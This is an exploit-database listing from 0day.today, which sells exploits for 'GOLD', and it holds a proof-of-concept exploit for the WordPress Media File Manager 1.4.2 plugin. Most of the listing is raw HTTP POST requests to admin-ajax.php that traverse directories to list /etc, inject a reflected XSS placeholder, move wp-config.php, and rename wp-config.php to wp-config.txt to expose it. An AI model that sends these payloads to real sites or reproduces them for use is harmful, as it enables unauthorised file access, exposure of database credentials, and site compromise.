0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Media File Manager 1.4.2 Plugin - Directory Traversal Vulnerability
[# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal # Exploit Author: Pasquale Turi (aka boombyte) # Vendor Homepage: https://wordpress.org/plugins/media-file-manager/ # Software Link: https://wordpress.org/plugins/media-file-manager/ # Version: 1.4.2 # CVE: N/A # Tested on: Ubuntu 18.10 # Plugin description: # This plugin can be used for manage the uploaded file (we can rename files, see a preview, # delete and move them to other folders under wordpress upload folder). # This plugin can be used by administrator, author, contributor and subscriber. # POC # Diretory trasversal: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: REDATED Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Connection: close Cookie: REDACTED action=mrelocator_getdir&dir=../../../../../../../etc # POC # XSS Reflected POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 Connection: close Cookie: REDACTED action=mrelocator_getdir&dir=[XSS] # POC # Move any file to any dir: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 75 Connection: close Cookie: REDACTED action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php # POC # Rename any file: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 97 Connection: close Cookie: REDACTED action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt # 0day.today [2024-10-05] #